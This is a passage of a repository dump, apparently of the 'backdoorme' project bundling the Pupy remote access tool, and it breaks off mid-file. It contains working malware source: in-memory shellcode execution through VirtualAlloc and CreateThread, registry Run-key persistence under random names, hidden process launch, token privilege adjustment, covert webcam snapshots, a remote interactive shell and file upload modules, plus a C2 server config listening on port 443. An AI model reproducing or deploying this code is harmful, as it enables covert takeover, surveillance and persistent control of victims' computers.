20 | res=str(e) 21 | 22 | if self.client.is_windows(): 23 | try: 24 | res=res.decode('cp437') 25 | except Exception: 26 | pass 27 | self.log(res) 28 | 29 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/shellcode_exec.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | 3 | ''' 4 | Module by @byt3bl33d3r 5 | ''' 6 | 7 | from pupylib.PupyModule import * 8 | 9 | __class_name__="ShellcodeExec" 10 | 11 | class ShellcodeExec(PupyModule): 12 | """ executes the supplied shellcode on a client """ 13 | 14 | def init_argparse(self): 15 | self.arg_parser = PupyArgumentParser(prog='shellcode_exec', description=self.__doc__) 16 | self.arg_parser.add_argument('path', help='Path to the shellcode to execute') 17 | 18 | @windows_only 19 | def is_compatible(self): 20 | pass 21 | 22 | def run(self, args): 23 | self.client.load_package("pupwinutils.shellcode") 24 | with open(args.path ,'r') as sfile: 25 | shellcode = sfile.read() 26 | self.client.conn.modules['pupwinutils.shellcode'].exec_shellcode(shellcode) 27 | self.log('Shellcode executed!') -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/upload.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | from pupylib.PupyModule import * 3 | from pupylib.PupyCompleter import * 4 | from rpyc.utils.classic import upload 5 | import os 6 | import os.path 7 | 8 | __class_name__="UploaderScript" 9 | 10 | class UploaderScript(PupyModule): 11 | """ upload a file/directory to a remote system """ 12 | def init_argparse(self): 13 | self.arg_parser = PupyArgumentParser(prog='download', description=self.__doc__) 14 | self.arg_parser.add_argument('local_file', metavar='', completer=path_completer) 15 | self.arg_parser.add_argument('remote_file', metavar='') 16 | def run(self, args): 17 | upload(self.client.conn, args.local_file, args.remote_file) 18 | self.success("file local:%s uploaded to remote:%s"%(args.local_file, args.remote_file)) 19 | 20 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/modules/webcamsnap.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | 3 | # -------------------------------------------------------------- 4 | # Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu) 5 | # All rights reserved. 6 | # 7 | # Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 8 | # 9 | # 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 10 | # 11 | # 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 12 | # 13 | # 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 14 | # 15 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE 16 | # -------------------------------------------------------------- 17 | 18 | from pupylib.PupyModule import * 19 | import os 20 | import os.path 21 | import textwrap 22 | import logging 23 | import datetime 24 | from zlib import compress, crc32 25 | import struct 26 | import subprocess 27 | 28 | __class_name__="WebcamSnapModule" 29 | 30 | def pil_save(filename, pixels, width, height): 31 | from PIL import Image, ImageFile 32 | buffer_len = (width * 3 + 3) & -4 33 | img = Image.frombuffer('RGB', (width, height), pixels, 'raw', 'BGR', buffer_len, 1) 34 | ImageFile.MAXBLOCK = width * height 35 | img=img.transpose(Image.FLIP_TOP_BOTTOM) 36 | img.save(filename, quality=95, optimize=True, progressive=True) 37 | logging.info('webcam snap saved to %s'%filename) 38 | 39 | 40 | class WebcamSnapModule(PupyModule): 41 | """ take a webcam snap :) """ 42 | @windows_only 43 | def is_compatible(self): 44 | pass 45 | 46 | def init_argparse(self): 47 | self.arg_parser = PupyArgumentParser(prog='webcam_snap', description=self.__doc__) 48 | self.arg_parser.add_argument('-d', '--device', type=int, default=0, help='take a webcam snap on a specific device (default : 0)') 49 | self.arg_parser.add_argument('-v', '--view', action='store_true', help='directly open eog on the snap for preview') 50 | 51 | def run(self, args): 52 | try: 53 | os.makedirs(os.path.join("data","webcam_snaps")) 54 | except Exception: 55 | pass 56 | self.client.load_package("vidcap") 57 | filepath=os.path.join("data","webcam_snaps","snap_"+self.client.short_name()+"_"+str(datetime.datetime.now()).replace(" ","_").replace(":","-")+".jpg") 58 | dev=self.client.conn.modules['vidcap'].new_Dev(args.device,0) 59 | self.info("device %s exists, taking a snap ..."%args.device) 60 | buff, width, height = dev.getbuffer() 61 | pil_save(filepath, buff, width, height) 62 | if args.view: 63 | subprocess.Popen(["eog",filepath]) 64 | self.success("webcam snap saved to %s"%filepath) 65 | 66 | 67 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/all/interactive_shell.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | 3 | import sys 4 | from subprocess import PIPE, Popen 5 | from threading import Thread 6 | from Queue import Queue, Empty 7 | import time 8 | import traceback 9 | 10 | ON_POSIX = 'posix' in sys.builtin_module_names 11 | 12 | def write_output(out, queue): 13 | try: 14 | for c in iter(lambda: out.read(1), b""): 15 | queue.put(c) 16 | out.close() 17 | except Exception as e: 18 | print(traceback.format_exc()) 19 | 20 | def flush_loop(queue, encoding): 21 | try: 22 | while True: 23 | buf=b"" 24 | while True: 25 | try: 26 | buf+=queue.get_nowait() 27 | except Empty: 28 | break 29 | if buf: 30 | if encoding: 31 | try: 32 | buf=buf.decode(encoding) 33 | except Exception: 34 | pass 35 | sys.stdout.write(buf) 36 | sys.stdout.flush() 37 | time.sleep(0.5) 38 | except Exception as e: 39 | print(traceback.format_exc()) 40 | 41 | def interactive_open(program=None, encoding=None): 42 | try: 43 | if program is None: 44 | if "win" in sys.platform.lower(): 45 | program="cmd.exe" 46 | encoding="cp437" 47 | else: 48 | program="/bin/sh" 49 | encoding=None 50 | print "Opening interactive %s ... (encoding : %s)"%(program,encoding) 51 | p = Popen([program], stdout=PIPE, stderr=PIPE, stdin=PIPE, bufsize=0, shell=True, close_fds=ON_POSIX, universal_newlines=True) 52 | q = Queue() 53 | q2 = Queue() 54 | t = Thread(target=write_output, args=(p.stdout, q)) 55 | t.daemon = True 56 | t.start() 57 | 58 | t = Thread(target=write_output, args=(p.stderr, q2)) 59 | t.daemon = True 60 | t.start() 61 | 62 | t = Thread(target=flush_loop, args=(q, encoding)) 63 | t.daemon = True 64 | t.start() 65 | 66 | t = Thread(target=flush_loop, args=(q2, encoding)) 67 | t.daemon = True 68 | t.start() 69 | 70 | while True: 71 | line = input() 72 | p.stdin.write(line+"\n") 73 | if line.strip()=="exit": 74 | break 75 | except Exception as e: 76 | print(traceback.format_exc()) 77 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/all/pupyutils/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kkevsterrr/backdoorme/f9755ca6cec600335e681752e7a1c5c617bb5a39/backdoors/shell/__pupy/pupy/packages/all/pupyutils/__init__.py -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/all/pupyutils/search.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: UTF8 -*- 3 | import os 4 | import os.path 5 | import re 6 | 7 | def search_file(path, search_strings): 8 | buf=b"" 9 | line_nb=0 10 | try: 11 | with open(path, 'rb') as f: 12 | for line in f: 13 | line=line.lower() 14 | for s in search_strings: 15 | start=0 16 | while True: 17 | i=line.find(s.lower(), start) 18 | if i==-1: 19 | break 20 | start=i+1 21 | yield (line_nb, line[i-50:i+50].strip()) 22 | line_nb+=1 23 | except Exception: 24 | pass 25 | 26 | 27 | def search_path(path, search_strings, files_extensions=None, max_size=None): 28 | """ search recursively for a string in all files in the path """ 29 | if not files_extensions: 30 | files_extensions=None 31 | if files_extensions is not None: 32 | files_extensions=tuple(files_extensions) 33 | for root, dirs, files in os.walk(path): 34 | for f in files: 35 | if files_extensions is None or f.lower().endswith(files_extensions): 36 | if max_size is None or os.path.getsize(os.path.join(root,f)) 9 | 10 | 11 | ''' 12 | 13 | oldLinux = '''span { 14 | font-family: Verdana; 15 | background: #e0e0d0; 16 | font-size: 13pt; 17 | } 18 | 19 | 20 | 21 | ''' 22 | 23 | new = '''span { 24 | font-family: Verdana; 25 | } 26 | 27 | 28 | 29 | ''' 30 | 31 | def fixhtmlfile(file): 32 | if os.path.isfile(file) and file[-5:] == '.html': 33 | print file 34 | fp = open(file, 'rt') 35 | cont = fp.read() 36 | fp.close() 37 | cont = string.replace(cont, '\r\n', '\n') 38 | cont = string.replace(cont, oldWin, new) 39 | cont = string.replace(cont, oldLinux, new) 40 | fp = open(file, 'wt') 41 | fp.write(cont) 42 | fp.close() 43 | 44 | def fixhtmlfiles(dir): 45 | files = os.listdir(dir) 46 | for file in files: 47 | fixhtmlfile(dir + os.sep + file) 48 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/src/VideoCapture/src/helvB08.pil: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kkevsterrr/backdoorme/f9755ca6cec600335e681752e7a1c5c617bb5a39/backdoors/shell/__pupy/pupy/packages/src/VideoCapture/src/helvB08.pil -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/src/VideoCapture/src/helvB08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kkevsterrr/backdoorme/f9755ca6cec600335e681752e7a1c5c617bb5a39/backdoors/shell/__pupy/pupy/packages/src/VideoCapture/src/helvB08.png -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/src/VideoCapture/src/helvetica-10.pil: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kkevsterrr/backdoorme/f9755ca6cec600335e681752e7a1c5c617bb5a39/backdoors/shell/__pupy/pupy/packages/src/VideoCapture/src/helvetica-10.pil -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/src/VideoCapture/src/helvetica-10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kkevsterrr/backdoorme/f9755ca6cec600335e681752e7a1c5c617bb5a39/backdoors/shell/__pupy/pupy/packages/src/VideoCapture/src/helvetica-10.png -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/src/VideoCapture/src/vidcap.dsw: -------------------------------------------------------------------------------- 1 | Microsoft Developer Studio Workspace File, Format Version 6.00 2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE! 3 | 4 | ############################################################################### 5 | 6 | Project: "vidcap"=.\vidcap.dsp - Package Owner=<4> 7 | 8 | Package=<5> 9 | {{{ 10 | }}} 11 | 12 | Package=<4> 13 | {{{ 14 | }}} 15 | 16 | ############################################################################### 17 | 18 | Global: 19 | 20 | Package=<5> 21 | {{{ 22 | }}} 23 | 24 | Package=<3> 25 | {{{ 26 | }}} 27 | 28 | ############################################################################### 29 | 30 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/src/pupymemexec/make.bat: -------------------------------------------------------------------------------- 1 | cl.exe pupymemexec.c /LD /D_WIN32 /IC:\Python27\include C:\Python27\libs\python27.lib /Fepupymemexec.pyd 2 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/src/pupymemexec/makex64.bat: -------------------------------------------------------------------------------- 1 | cl.exe pupymemexec.c /LD /D_WIN64 /IC:\Python27\include C:\Python27\libs\python27.lib /Fepupymemexec.pyd 2 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/windows/all/pupwinutils/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kkevsterrr/backdoorme/f9755ca6cec600335e681752e7a1c5c617bb5a39/backdoors/shell/__pupy/pupy/packages/windows/all/pupwinutils/__init__.py -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/windows/all/pupwinutils/msgbox.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: UTF8 -*- 3 | 4 | import ctypes 5 | import threading 6 | 7 | def MessageBox(text, title): 8 | t=threading.Thread(target=ctypes.windll.user32.MessageBoxA, args=(None, text, title, 0)) 9 | t.daemon=True 10 | t.start() 11 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/windows/all/pupwinutils/persistence.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | # -------------------------------------------------------------- 3 | # Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu) 4 | # All rights reserved. 5 | # 6 | # Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 7 | # 8 | # 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 9 | # 10 | # 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 11 | # 12 | # 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 13 | # 14 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE 15 | # -------------------------------------------------------------- 16 | from _winreg import * 17 | import random 18 | import string 19 | 20 | def add_registry_startup(bin_path): 21 | randname=''.join([random.choice(string.ascii_lowercase) for i in range(0,random.randint(6,12))]) 22 | try: 23 | aKey = OpenKey(HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE) 24 | try: 25 | SetValueEx(aKey, randname, 0, REG_SZ, bin_path) 26 | finally: 27 | CloseKey(aKey) 28 | except Exception: 29 | aKey2 = OpenKey(HKEY_CURRENT_USER, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE) 30 | try: 31 | SetValueEx(aKey2, randname, 0, REG_SZ, bin_path) 32 | finally: 33 | CloseKey(aKey2) 34 | 35 | 36 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/windows/all/pupwinutils/processes.py: -------------------------------------------------------------------------------- 1 | # -------------------------------------------------------------- 2 | # Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu) 3 | # All rights reserved. 4 | # 5 | # Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 6 | # 7 | # 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 8 | # 9 | # 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 10 | # 11 | # 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 12 | # 13 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE 14 | # -------------------------------------------------------------- 15 | from ctypes import byref, c_bool 16 | from ctypes import windll 17 | import psutil 18 | import platform 19 | import subprocess 20 | 21 | PROCESS_QUERY_INFORMATION = 0x0400 22 | PROCESS_VM_READ = 0x0010 23 | MAX_PATH=260 24 | 25 | def is_process_64(pid): 26 | """ Take a pid. return True if process is 64 bits, and False otherwise. """ 27 | is64=False 28 | if not "64" in platform.machine(): 29 | return False 30 | hProcess = windll.kernel32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid) 31 | is64=is_process_64_from_handle(hProcess) 32 | windll.kernel32.CloseHandle(hProcess) 33 | return is64 34 | 35 | def is_process_64_from_handle(hProcess): 36 | """ Take a process handle. return True if process is 64 bits, and False otherwise. """ 37 | iswow64 = c_bool(False) 38 | if not hasattr(windll.kernel32,'IsWow64Process'): 39 | return False 40 | windll.kernel32.IsWow64Process(hProcess, byref(iswow64)) 41 | return not iswow64.value 42 | 43 | def enum_processes(): 44 | proclist=[] 45 | for proc in psutil.process_iter(): 46 | try: 47 | pinfo = proc.as_dict(attrs=['username', 'pid', 'name', 'exe', 'cmdline', 'status']) 48 | pinfo['arch']=("x64" if is_process_64(int(pinfo['pid'])) else "x32") 49 | proclist.append(pinfo) 50 | except psutil.NoSuchProcess: 51 | pass 52 | return proclist 53 | 54 | def start_hidden_process(path): 55 | info = subprocess.STARTUPINFO() 56 | info.dwFlags = subprocess.STARTF_USESHOWWINDOW|subprocess.CREATE_NEW_PROCESS_GROUP 57 | info.wShowWindow = subprocess.SW_HIDE 58 | p=subprocess.Popen(path, startupinfo=info) 59 | return p 60 | 61 | 62 | if __name__ == '__main__': 63 | for dic in enum_processes(): 64 | print dic 65 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/windows/all/pupwinutils/security.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | # -------------------------------------------------------------- 3 | # Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu) 4 | # All rights reserved. 5 | # 6 | # Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 7 | # 8 | # 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 9 | # 10 | # 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 11 | # 12 | # 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 13 | # 14 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE 15 | # -------------------------------------------------------------- 16 | from ctypes import * 17 | 18 | LPVOID = c_void_p 19 | HANDLE = LPVOID 20 | INVALID_HANDLE_VALUE = c_void_p(-1).value 21 | DWORD = c_uint32 22 | LONG= c_long 23 | 24 | class LUID(Structure): 25 | _fields_ = [ 26 | ("LowPart", DWORD), 27 | ("HighPart", LONG), 28 | ] 29 | class LUID_AND_ATTRIBUTES(Structure): 30 | _fields_ = [ 31 | ("Luid", LUID), 32 | ("Attributes", DWORD), 33 | ] 34 | 35 | class TOKEN_PRIVILEGES(Structure): 36 | _fields_ = [ 37 | ("PrivilegeCount", DWORD), 38 | ("Privileges", LUID_AND_ATTRIBUTES), 39 | ] 40 | 41 | def EnablePrivilege(privilegeStr, hToken = None): 42 | """Enable Privilege on token, if no token is given the function gets the token of the current process.""" 43 | close=False 44 | if hToken == None: 45 | close=True 46 | TOKEN_ADJUST_PRIVILEGES = 0x00000020 47 | TOKEN_QUERY = 0x0008 48 | hToken = HANDLE(INVALID_HANDLE_VALUE) 49 | res=windll.advapi32.OpenProcessToken( windll.kernel32.GetCurrentProcess(), (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY), byref(hToken) ) 50 | 51 | privilege_id = LUID() 52 | res=windll.advapi32.LookupPrivilegeValueA(None, privilegeStr, byref(privilege_id)) 53 | 54 | SE_PRIVILEGE_ENABLED = 0x00000002 55 | laa = LUID_AND_ATTRIBUTES(privilege_id, SE_PRIVILEGE_ENABLED) 56 | tp = TOKEN_PRIVILEGES(1, laa) 57 | 58 | ERROR_NOT_ALL_ASSIGNED=1300 59 | 60 | res=windll.advapi32.AdjustTokenPrivileges(hToken, False, byref(tp), sizeof(tp), None, None) 61 | if not res: 62 | raise WinError() 63 | else: 64 | res=windll.kernel32.GetLastError() 65 | if res!=0: 66 | raise WinError() 67 | if close: 68 | windll.kernel32.CloseHandle(hToken) 69 | 70 | 71 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/windows/all/pupwinutils/shellcode.py: -------------------------------------------------------------------------------- 1 | import ctypes 2 | import threading 3 | 4 | def allocate_exe(shellcode): 5 | 6 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), 7 | ctypes.c_int(len(shellcode)), 8 | ctypes.c_int(0x3000), 9 | ctypes.c_int(0x40)) 10 | 11 | buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) 12 | 13 | ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), 14 | buf, 15 | ctypes.c_int(len(shellcode))) 16 | 17 | ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), 18 | ctypes.c_int(0), 19 | ctypes.c_int(ptr), 20 | ctypes.c_int(0), 21 | ctypes.c_int(0), 22 | ctypes.pointer(ctypes.c_int(0))) 23 | 24 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1)) 25 | 26 | def exec_shellcode(shellcode): 27 | shellcode = bytearray(shellcode) 28 | t = threading.Thread(target=allocate_exe, args=(shellcode,)) 29 | t.daemon = True 30 | t.start() -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/windows/amd64/psutil/_psutil_windows.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kkevsterrr/backdoorme/f9755ca6cec600335e681752e7a1c5c617bb5a39/backdoors/shell/__pupy/pupy/packages/windows/amd64/psutil/_psutil_windows.pyd -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/windows/amd64/pupymemexec.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kkevsterrr/backdoorme/f9755ca6cec600335e681752e7a1c5c617bb5a39/backdoors/shell/__pupy/pupy/packages/windows/amd64/pupymemexec.pyd -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/windows/amd64/vidcap.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kkevsterrr/backdoorme/f9755ca6cec600335e681752e7a1c5c617bb5a39/backdoors/shell/__pupy/pupy/packages/windows/amd64/vidcap.pyd -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/windows/x86/psutil/_psutil_windows.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kkevsterrr/backdoorme/f9755ca6cec600335e681752e7a1c5c617bb5a39/backdoors/shell/__pupy/pupy/packages/windows/x86/psutil/_psutil_windows.pyd -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/packages/windows/x86/vidcap.pyd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kkevsterrr/backdoorme/f9755ca6cec600335e681752e7a1c5c617bb5a39/backdoors/shell/__pupy/pupy/packages/windows/x86/vidcap.pyd -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/pupy.conf: -------------------------------------------------------------------------------- 1 | [pupyd] 2 | address = 0.0.0.0 3 | port = 443 4 | keyfile = crypto/server.pem 5 | certfile = crypto/cert.pem 6 | 7 | [cmdline] 8 | display_banner = yes 9 | colors = yes 10 | 11 | [aliases] 12 | info = get_info 13 | pyexec = pyexec 14 | exec = shell_exec 15 | ps = ps 16 | migrate = migrate 17 | kill = process_kill 18 | #tasklist = shell_exec 'tasklist /v' 19 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/pupylib/PupyErrors.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | # -------------------------------------------------------------- 3 | # Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu) 4 | # All rights reserved. 5 | # 6 | # Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 7 | # 8 | # 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 9 | # 10 | # 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 11 | # 12 | # 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 13 | # 14 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE 15 | # -------------------------------------------------------------- 16 | class PupyModuleExit(BaseException): 17 | pass 18 | class PupyModuleError(BaseException): 19 | pass 20 | -------------------------------------------------------------------------------- /backdoors/shell/__pupy/pupy/pupylib/PupyService.py: -------------------------------------------------------------------------------- 1 | # -*- coding: UTF8 -*- 2 | # -------------------------------------------------------------- 3 | # Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu) 4 | # All rights reserved. 5 | # 6 | # Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 7 | # 8 | # 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 9 | # 10 | # 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 11 | # 12 | # 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. 13 | # 14 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 